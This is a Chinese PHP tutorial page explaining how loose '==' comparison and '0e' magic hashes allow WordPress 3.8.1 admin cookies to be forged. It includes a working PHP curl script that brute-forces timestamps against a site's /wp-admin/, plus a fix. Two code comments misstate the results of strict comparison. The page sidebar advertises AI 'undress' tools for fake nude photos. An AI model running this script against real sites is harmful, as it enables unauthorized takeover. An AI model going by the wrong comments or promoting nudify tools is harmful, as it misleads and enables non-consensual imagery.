PHP弱类型：WordPress Cookie伪造，wordpresscookie

首頁

後端開發

php教程

PHP弱类型：WordPress Cookie伪造，wordpresscookie_PHP教程

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 13, 2016 am 09:45 AM

cookie php wordpress 偽造類型

PHP弱类型：WordPress Cookie伪造，wordpresscookie

1 PHP弱类型

　　PHP是弱类型语言，所以变量会因为使用场景的不同自动进行类型转换。PHP中用 == 以及！= 进行相等判断时，会自动进行类型转换，用 === 以及！== 进行判断时不会自动转换类型。

<span>1</span> <?<span>php
</span><span>2</span>     <span>$a</span> = 3<span>;
</span><span>3</span>     <span>$b</span> = '3vic'<span>;
</span><span>4</span>     <span>var_dump</span>(<span>$a</span> == <span>$b</span>);<span>//</span><span>true</span>
<span>5</span>     <span>var_dump</span>(<span>$a</span> != <span>$b</span>);<span>//</span><span>false</span>
<span>6</span>     <span>var_dump</span>(<span>$a</span> === <span>$b</span>);<span>//</span><span>true</span>
<span>7</span>     <span>var_dump</span>(<span>$a</span> !== <span>$b</span>);<span>//</span><span>false</span>
<span>8</span> ?>

登入後複製

　说明：在PHP中字符串转换成整型时，如果是数字开头就会转换成前面的数字（'3vic' -> 3），如果不是数字开头，那么就会转换成0（'vic' -> 0）

2 WordPress代码

WordPress 3.8.1 与 WordPress 3.8.2 部分代码区别

<span>1</span> <?<span>php
</span><span>2</span>     <span>//</span><span> WordPress 3.8.1</span>
<span>3</span>     <span>if</span> (<span>$hmac</span> != <span>$hash</span><span>) {}
</span><span>4</span>     <span>//</span><span> WordPress 3.8.2</span>
<span>5</span>     <span>if</span> ( hash_hmac('md5', <span>$hmac</span>, <span>$key</span>) !== hash_hmac('md5', <span>$hash</span>, <span>$key</span><span>) )  {}
</span><span>6</span> ?>

登入後複製

Cookie 组成

　　客户端后台只验证其中的一条Cookie，如下所示

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|<span>1433403595</span>|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly

登入後複製

其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式为 wordpress_ + md5(siteurl) 其中siteurl为WordPress的网址，此处网站地址为http://www.test.ichunqiu,md5加密后为c47f4a97d0321c1980bb76fc00d1e78f，其它部分也可省。

类型　　　　　　用户名　　　　　过期时间　　　　　　　　登录成功服务器端赋予客户端的hash值

对应变量	$username	$expiration	$hmac
cookies	admin	1433403595	cf50f3b50eed94dd0fdc3d3ea2c7bbb

分析验证登录

　　代码 wp-includes/pluggable.php 第543-549行

<span>1</span> <?<span>php
</span><span>2</span>     <span>$key</span> = wp_hash(<span>$username</span> . <span>$pass_frag</span> . '|' . <span>$expiration</span>, <span>$scheme</span><span>);
</span><span>3</span>     <span>$hash</span> = hash_hmac('md5', <span>$username</span> . '|' . <span>$expiration</span>, <span>$key</span><span>);
</span><span>4</span>     <span>if</span> ( <span>$hmac</span> != <span>$hash</span><span> ) {
</span><span>5</span>     do_action('auth_cookie_bad_hash', <span>$cookie_elements</span><span>);
</span><span>6</span>     <span>return</span> <span>false</span><span>;
</span><span>7</span> }

登入後複製

在代码所使用的变量中，通过改变客户端Cookie 的方式可控的有 $username 用户名，$expiration 有效期，又因为其中用户名是固定的，因此只有$expiration是可控的，所以我们可以从改变 $expiration 的方法来改变$hash。

结合PHP Hash 比较缺陷分析 WordPress

有以下几种可能使 $hmac == $hash 为真，字符串完全相等或者 $hmac 等于0的同时 $hash 为以字符开头的字符串; 将客户端的Cookie中 $hmac 值改为0，然后在if ( $hmac != $hash ) {的上面一行写入var_dump($hmac);die();发现打印出来 $hmac 的结果是 string '0'而不是int 0，那么有没有方法使字符串识别为整数呢，代码如下：

<span>1</span> <?<span>php
</span><span>2</span> <span>var_dump</span>('0' == '0e156464513131');<span>//</span><span>true</span>

登入後複製

其中的 0e156464513131 会被识别为0乘以10的156464513131次方，还是得0；因此当 $hash 以0e开头后面全是数字时就会与 $hmac 的值为 '0' 时相等，所以我们可以将客户端的Cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然后不断更新过期时间（现在1433403595的位置）的方法来碰撞服务器端，一旦 $hash 的值为0e开头后面全是数字即可验证通过。假设碰撞成功，就修改浏览器的Cookie，直接访问后台地址，就可以成功登陆后台。

3 测试脚本

　　通过改变客户端Cookie里过期时间的值，不断尝试登录后台，找出可以进入后台的时间戳，从而实现Cookie伪造登录后台。

<span> 1</span> <?<span>php
</span><span> 2</span> <span>/*</span>
<span> 3</span> 
<span> 4</span> <span>本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
</span><span> 5</span> <span>传入两个值
</span><span> 6</span> <span>  WordPress 的主页 $host
</span><span> 7</span> <span>  管理员用户名     $root
</span><span> 8</span> <span>*/</span>
<span> 9</span>     <span>header</span>("Content-type:text/html;charset=utf-8"<span>);
</span><span>10</span> 
<span>11</span>     <span>$host</span> = 'http://xxx.xxx.xxx';<span>//</span><span>主页地址 结尾不带'/'</span>
<span>12</span>     <span>$root</span> = 'user';<span>//</span><span>管理员用户名</span>
<span>13</span> 
<span>14</span>     <span>$url</span> = <span>$host</span>.'/wp-admin/';<span>//</span><span>后台管理地址    </span>
<span>15</span>     <span>$sitehash</span>=<span>md5</span>(<span>$host</span><span>); 
</span><span>16</span> 
<span>17</span>     <span>echo</span> "\nWelcome\n\n"<span>;
</span><span>18</span>     <span>//</span><span>通过时间戳暴力破解cookie 实现伪造cookie</span>
<span>19</span>     <span>for</span>(<span>$i</span>=1500000000;<span>$i</span><1600000000;<span>$i</span>++<span>){
</span><span>20</span>         <span>$cookie</span> = "wordpress_".<span>$sitehash</span>."=".<span>$root</span>."|".<span>$i</span>."|0;";<span>//</span><span>组合构造cookie</span>
<span>21</span>         <span>$header</span> = <span>array</span><span>(
</span><span>22</span>        "Content-Type:application/x-www-form-urlencoded",
<span>23</span>       'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',
<span>24</span>       "Cookie:".<span>$cookie</span>,
<span>25</span> <span>      );
</span><span>26</span> 
<span>27</span>         <span>$curl</span> = curl_init(); <span>//</span><span> 启动一个CURL会话    </span>
<span>28</span>         curl_setopt(<span>$curl</span>, CURLOPT_URL, <span>$url</span>); <span>//</span><span> 要访问的地址</span>
<span>29</span>         curl_setopt(<span>$curl</span>, CURLOPT_FOLLOWLOCATION, 1); <span>//</span><span> 使用自动跳转    </span>
<span>30</span>         curl_setopt(<span>$curl</span>, CURLOPT_AUTOREFERER, 1); <span>//</span><span> 自动设置Referer    </span>
<span>31</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTPGET, <span>true</span>); <span>//</span><span> 发送一个常规的Post请求    </span>
<span>32</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTPHEADER, <span>$header</span>); <span>//</span><span> 读取上面所储存的Cookie信息         </span>
<span>33</span>         curl_setopt(<span>$curl</span>, CURLOPT_RETURNTRANSFER, 1); <span>//</span><span> 获取的信息以文件流的形式返回 </span>
<span>34</span>         curl_setopt(<span>$curl</span>, CURLOPT_HEADER, <span>false</span><span>);
</span><span>35</span>         curl_setopt(<span>$curl</span>, CURLOPT_HEADER, 0<span>);   
</span><span>36</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);<span>//</span><span>让curl自动选择版本</span>
<span>37</span>         <span>$tmpInfo</span> = curl_exec(<span>$curl</span>); <span>//</span><span> 执行操作</span>
<span>38</span>         <span>if</span> (curl_errno(<span>$curl</span><span>)) {    
</span><span>39</span>         <span>echo</span> 'Errno'.curl_error(<span>$curl</span><span>);    
</span><span>40</span> <span>        }    
</span><span>41</span>         curl_close(<span>$curl</span>); <span>//</span><span> 关闭CURL会话
</span><span>42</span> 
<span>43</span> <span>        //匹配结果</span>
<span>44</span>         <span>if</span>(<span>strstr</span>(<span>$tmpInfo</span>,'我们准备了几个链接供您开始'<span>)){
</span><span>45</span>             <span>echo</span>  "\n".'success : '.<span>$cookie</span>."\n\n"<span>;
</span><span>46</span>             <span>break</span><span>;
</span><span>47</span>         }<span>else</span><span>{
</span><span>48</span>             <span>echo</span>  'fail : '.<span>$cookie</span>."\n"<span>;
</span><span>49</span> <span>        }
</span><span>50</span> 
<span>51</span> <span>    }
</span><span>52</span> ?>

登入後複製

说明：理论上32位的MD5值以0e开头的大概三亿分之一，碰撞到可以利用的 $expiration 几率极低。

5 修复方案

　　PHP 中使用的哈希比较函数，将其中的 == ，！= 分别更改为 === 和！== 或者将比较的两个变量使用MD5再加密一次。

学习笔记：http://ichunqiu.com/course/167

本網站聲明

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

人工智慧驅動的應用程序，用於創建逼真的裸體照片

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

免費脫衣圖片

Clothoff.io

AI脫衣器

Video Face Swap

使用我們完全免費的人工智慧換臉工具，輕鬆在任何影片中換臉！

熱工具

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

中文版，非常好用

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

熱門話題

gmail信箱登陸入口在哪裡

7692

Java教學

1639

CakePHP 教程

1393

Laravel 教程

1287

PHP教程

1229

Related knowledge

wordpress文章列表怎麼調 Apr 20, 2025 am 10:48 AM

有四種方法可以調整 WordPress 文章列表：使用主題選項、使用插件（如 Post Types Order、WP Post List、Boxy Stuff）、使用代碼（在 functions.php 文件中添加設置）或直接修改 WordPress 數據庫。

wordpress屏蔽ip的插件有哪些 Apr 20, 2025 am 08:27 AM

WordPress 屏蔽 IP 的插件選擇至關重要。可考慮以下類型：基於 .htaccess：高效，但操作複雜；數據庫操作：靈活，但效率較低；基於防火牆：安全性能高，但配置複雜；自行編寫：最高控制權，但需要更多技術水平。

wordpress出現錯誤怎麼辦 Apr 20, 2025 am 11:57 AM

WordPress 錯誤解決指南：500 內部服務器錯誤：禁用插件或檢查服務器錯誤日誌。 404 未找到頁面：檢查 permalink 並確保頁面鏈接正確。白屏死機：增加服務器 PHP 內存限制。數據庫連接錯誤：檢查數據庫服務器狀態和 WordPress 配置。其他技巧：啟用調試模式、檢查錯誤日誌和尋求支持。預防錯誤：定期更新 WordPress、僅安裝必要插件、定期備份網站和優化網站性能。

wordpress網站賬號登錄 Apr 20, 2025 am 09:06 AM

登錄 WordPress 網站賬號的步驟：訪問登錄頁面：輸入網站網址加上 "/wp-login.php"。輸入用戶名和密碼。點擊“登錄”。驗證兩步驗證（可選）。成功登錄後，您將看到網站儀錶盤。

wordpress評論怎麼顯示 Apr 20, 2025 pm 12:06 PM

WordPress 網站中啟用評論功能：1. 登錄管理面板，轉到 "設置"-"討論"，勾選 "允許評論"；2. 選擇顯示評論的位置；3. 自定義評論表單；4. 管理評論，批准、拒絕或刪除；5. 使用 <?php comments_template(); ?> 標籤顯示評論；6. 啟用嵌套評論；7. 調整評論外形；8. 使用插件和驗證碼防止垃圾評論；9. 鼓勵用戶使用 Gravatar 頭像；10. 創建評論指

wordpress主題頭部圖片如何更換 Apr 20, 2025 am 10:00 AM

更換 WordPress 主題頭部圖片的分步指南：登錄 WordPress 儀錶盤，導航至“外觀”>“主題”。選擇要編輯的主題，然後單擊“自定義”。打開“主題選項”面板並尋找“網站標頭”或“頭部圖片”選項。單擊“選擇圖像”按鈕並上傳新的頭部圖片。裁剪圖像並單擊“保存並裁剪”。單擊“保存並發布”按鈕以更新更改。